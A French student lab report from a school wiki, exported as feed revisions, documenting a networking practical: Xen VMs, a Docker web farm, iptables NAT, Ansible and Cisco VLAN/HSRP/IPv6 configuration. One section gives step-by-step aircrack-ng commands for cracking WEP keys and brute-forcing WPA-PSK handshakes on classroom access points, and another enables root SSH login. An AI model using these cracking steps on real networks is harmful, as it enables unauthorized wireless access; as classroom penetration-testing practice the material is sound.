Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Partie  ASR ==&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
&lt;br /&gt;
Ansible permet l'automatisation par connexion sans mot de passe.&lt;br /&gt;
Il faut d'abord générer une clef asymétrique :&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
&lt;br /&gt;
Installation de la clef publique sur les machines virtuelles 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Il faut  installer Ansible : &lt;br /&gt;
 apt install ansible&lt;br /&gt;
====Hosts====&lt;br /&gt;
Ensuite il faut rédiger l'inventaire ( /etc/ansible/hosts ) c'est un fichier yaml, il faut très attention à la syntaxe. Ce fichier regroupe le parc informatique :&lt;br /&gt;
&lt;br /&gt;
 all:&lt;br /&gt;
 hosts:&lt;br /&gt;
  interne:&lt;br /&gt;
    ansible_host: 192.168.0.2&lt;br /&gt;
 children:&lt;br /&gt;
  serveur-web:&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.[1:6]&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter automatique, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est une liste des tâches à effectuer sur ces machines.&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52016</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52016"/>
				<updated>2020-01-05T15:12:02Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Liaison R1 vers COM-2 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
====SSH====&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En première approche, nous avons souhaité activer une connexion sécurisée (SSH) de management en créant des clés RSA et une configuration VTY mais le commutateur n'a pas l'air, à première vue, d'implémenter cette fonctionnalité  nous laissant qu'avec du Telnet (en Clair) que nous avons donc décidé de ne pas configurer.&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain Interface (BDI)&lt;br /&gt;
&lt;br /&gt;
HSRP: Hot standby router protocol [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus]&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
Et pour le management&lt;br /&gt;
